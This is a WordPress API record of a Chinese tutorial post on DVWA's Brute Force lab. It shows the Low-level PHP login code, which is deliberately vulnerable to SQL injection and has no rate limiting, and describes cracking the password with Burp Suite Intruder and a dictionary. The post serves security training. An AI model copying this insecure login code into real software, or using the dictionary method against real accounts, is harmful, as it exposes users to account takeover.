{"id":2159,"date":"2017-12-10T10:53:09","date_gmt":"2017-12-10T02:53:09","guid":{"rendered":"https:\/\/www.daycode.net\/?p=2159"},"modified":"2018-09-04T20:16:58","modified_gmt":"2018-09-04T12:16:58","slug":"%e6%9a%b4%e5%8a%9b%e7%a0%b4%e8%a7%a3%ef%bc%88brute-force%ef%bc%89","status":"publish","type":"post","link":"https:\/\/www.daycode.net\/2159.html","title":{"rendered":"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09"},"content":{"rendered":"<p><strong>DVWA\uff08Damn Vulnerable Web Application\uff09\u662f\u4e00\u4e2a\u7528\u6765\u8fdb\u884c\u5b89\u5168\u8106\u5f31\u6027\u9274\u5b9a\u7684PHP\/MySQL Web\u5e94\u7528\uff0c\u65e8\u5728\u4e3a\u5b89\u5168\u4e13\u4e1a\u4eba\u5458\u6d4b\u8bd5\u81ea\u5df1\u7684\u4e13\u4e1a\u6280\u80fd\u548c\u5de5\u5177\u63d0\u4f9b\u5408\u6cd5\u7684\u73af\u5883\uff0c\u5e2e\u52a9web\u5f00\u53d1\u8005\u66f4\u597d\u7684\u7406\u89e3web\u5e94\u7528\u5b89\u5168\u9632\u8303\u7684\u8fc7\u7a0b\u3002<\/strong><\/p>\n<p><strong>Brute Force\uff0c\u5373\u66b4\u529b\uff08\u7834\u89e3\uff09\uff0c\u662f\u6307\u9ed1\u5ba2\u5229\u7528\u5bc6\u7801\u5b57\u5178\uff0c\u4f7f\u7528\u7a77\u4e3e\u6cd5\u731c\u89e3\u51fa\u7528\u6237\u53e3\u4ee4\uff0c\u662f\u73b0\u5728\u6700\u4e3a\u5e7f\u6cdb\u4f7f\u7528\u7684\u653b\u51fb\u624b\u6cd5\u4e4b\u4e00\uff0c\u59822014\u5e74\u8f70\u52a8\u5168\u56fd\u768412306\u201c\u649e\u5e93\u201d\u4e8b\u4ef6\uff0c\u5b9e\u8d28\u5c31\u662f\u66b4\u529b\u7834\u89e3\u653b\u51fb<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0cDVWA 1.9\u7684\u4ee3\u7801\u5206\u4e3a\u56db\u79cd\u5b89\u5168\u7ea7\u522b\uff1aLow\uff0cMedium\uff0cHigh\uff0cImpossible\u3002\u521d\u5b66\u8005\u53ef\u4ee5\u901a\u8fc7\u6bd4\u8f83\u56db\u79cd\u7ea7\u522b\u7684\u4ee3\u7801\uff0c\u63a5\u89e6\u5230\u4e00\u4e9bPHP\u4ee3\u7801\u5ba1\u8ba1\u7684\u5185\u5bb9\u3002<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><b>\u4e0b\u9762\u5c06\u5bf9\u56db\u79cd\u7ea7\u522b\u7684\u4ee3\u7801\u8fdb\u884c\u5206\u6790\u3002<\/b><\/p>\n<p>&nbsp;<\/p>\n<h3><b>Low<\/b>\u670d\u52a1\u5668\u7aef\u6838\u5fc3\u4ee3\u7801<\/h3>\n<p><span class=\"hljs-meta\">&lt;?php<\/span> <span class=\"hljs-keyword\">if<\/span>(<span class=\"hljs-keyword\">isset<\/span>($_GET[<span class=\"hljs-string\">'Login'<\/span>])){ <span class=\"hljs-comment\">\/\/Getusername<\/span> $user=$_GET[<span class=\"hljs-string\">'username'<\/span>]; <span class=\"hljs-comment\">\/\/Getpassword<\/span> $pass=$_GET[<span class=\"hljs-string\">'password'<\/span>]; $pass=md5($pass); <span class=\"hljs-comment\">\/\/Checkthedatabase<\/span> $query=<span class=\"hljs-string\">\"SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';\"<\/span>; $result=mysql_query($query)ordie(<span class=\"hljs-string\">'&lt;pre&gt;'<\/span>.mysql_error().<span class=\"hljs-string\">'&lt;\/pre&gt;'<\/span>); <span class=\"hljs-keyword\">if<\/span>($result&amp;&amp;mysql_num_rows($result)==<span class=\"hljs-number\">1<\/span>){ <span class=\"hljs-comment\">\/\/Getusersdetails<\/span> $avatar=mysql_result($result,<span class=\"hljs-number\">0<\/span>,<span class=\"hljs-string\">\"avatar\"<\/span>); <span class=\"hljs-comment\">\/\/Loginsuccessful<\/span> <span class=\"hljs-keyword\">echo<\/span><span class=\"hljs-string\">\"&lt;p&gt;Welcometothepasswordprotectedarea{$user}&lt;\/p&gt;\"<\/span>; <span class=\"hljs-keyword\">echo<\/span><span class=\"hljs-string\">\"&lt;imgsrc=\"<\/span>{$avatar}<span class=\"hljs-string\">\"\/&gt;\"<\/span>; } <span class=\"hljs-keyword\">else<\/span>{ <span class=\"hljs-comment\">\/\/Loginfailed<\/span> <span class=\"hljs-keyword\">echo<\/span><span class=\"hljs-string\">\"&lt;pre&gt;&lt;br\/&gt;Usernameand\/orpasswordincorrect.&lt;\/pre&gt;\"<\/span>; } mysql_close(); } <span class=\"hljs-meta\">?&gt;<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u53ef\u4ee5\u770b\u5230\uff0c\u670d\u52a1\u5668\u53ea\u662f\u9a8c\u8bc1\u4e86\u53c2\u6570Login\u662f\u5426\u88ab\u8bbe\u7f6e\uff08isset\u51fd\u6570\u5728php\u4e2d\u7528\u6765\u68c0\u6d4b\u53d8\u91cf\u662f\u5426\u8bbe\u7f6e\uff0c\u8be5\u51fd\u6570\u8fd4\u56de\u7684\u662f\u5e03\u5c14\u7c7b\u578b\u7684\u503c\uff0c\u5373true\/false\uff09\uff0c\u6ca1\u6709\u4efb\u4f55\u7684\u9632\u7206\u7834\u673a\u5236\uff0c\u4e14\u5bf9\u53c2\u6570username\u3001password\u6ca1\u6709\u505a\u4efb\u4f55\u8fc7\u6ee4\uff0c\u5b58\u5728\u660e\u663e\u7684sql\u6ce8\u5165\u6f0f\u6d1e<\/strong><\/p>\n<hr \/>\n<p><b>\u7206\u7834\u5229\u7528burpsuite\u5373\u53ef\u5b8c\u6210<\/b><\/p>\n<p>\u7b2c\u4e00\u6b65\u6293\u5305<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/image.3001.net\/images\/20161009\/14760003309956.png!small\"  width=\"690\" height=\"270\" title=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe\" alt=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe\" \/><\/p>\n<p>\u7b2c\u4e8c\u6b65\uff0cctrl+I\u5c06\u5305\u590d\u5236\u5230intruder\u6a21\u5757\uff0c\u56e0\u4e3a\u8981\u5bf9password\u53c2\u6570\u8fdb\u884c\u7206\u7834\uff0c\u6240\u4ee5\u5728password\u53c2\u6570\u7684\u5185\u5bb9\u4e24\u8fb9\u52a0$<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/image.3001.net\/images\/20161009\/1476000296331.png!small\"  width=\"628\" height=\"251\" title=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe1\" alt=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe1\" \/><\/p>\n<p>\u7b2c\u4e09\u6b65\u9009\u4e2dPayloads\uff0c\u8f7d\u5165\u5b57\u5178\uff0c\u70b9\u51fbStart attack\u8fdb\u884c\u7206\u7834<img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/image.3001.net\/images\/20161009\/14760003769188.png!small\"  width=\"628\" height=\"508\" title=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe2\" alt=\"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09\u63d2\u56fe2\" \/><\/p>\n<p>\u6700\u540e\uff0c\u5c1d\u8bd5\u5728\u7206\u7834\u7ed3\u679c\u4e2d\u627e\u5230\u6b63\u786e\u7684\u5bc6\u7801\uff0c\u53ef\u4ee5\u770b\u5230password\u7684\u54cd\u5e94\u5305\u957f\u5ea6\uff08length\uff09\u201c\u4e0e\u4f17\u4e0d\u540c\u201d\uff0c\u53ef\u63a8\u6d4bpassword\u4e3a\u6b63\u786e\u5bc6\u7801\uff0c\u624b\u5de5\u9a8c\u8bc1<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"\u66b4\u529b\u7834\u89e3*\uff08Brute Force\uff09","protected":false},"author":8830,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[455],"tags":[499],"class_list":["post-2159","post","type-post","status-publish","format-standard","hentry","category-jiaocheng","tag-brute-force"],"views":6477,"_links":{"self":[{"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/posts\/2159"}],"collection":[{"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/users\/8830"}],"replies":[{"embeddable":true,"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/comments?post=2159"}],"version-history":[{"count":0,"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/posts\/2159\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/media?parent=2159"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/categories?post=2159"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.daycode.net\/api\/wp\/v2\/tags?post=2159"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}